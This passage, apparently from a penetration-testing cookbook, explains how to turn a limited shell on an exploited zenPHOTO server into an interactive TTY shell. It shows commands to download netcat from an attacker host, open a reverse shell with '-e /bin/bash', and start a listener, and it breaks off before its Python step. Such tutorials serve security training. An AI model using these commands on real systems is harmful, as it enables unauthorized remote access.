Spawning a TTY Shell
We have covered different types of privilege escalation. Now let's look at some examples on how to get a TTY shell on this system. A TTY showcases a simple text output environment, that allows us to type commands and get the output.
How to do it...
- Let's look at the following example, where we have a web application running
zenPHOTO:
- The
zenPHOTOalready has a public exploit running, which we get access to via a limited shell:
- Since this is a limited shell, we try to escape it and get a reverse connection by first uploading
netcaton the system and then usingnetcatto gain a backconnect:
wget x.x.x.x/netcat –o /tmp/netcat
- Now we can backconnect using the following command:
netcat <our IP > -e /bin/bash <port number>
- Looking at our Terminal window, where we had our listener setup, we will see a successful connection:
nc –lnvp <port number>
Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it...
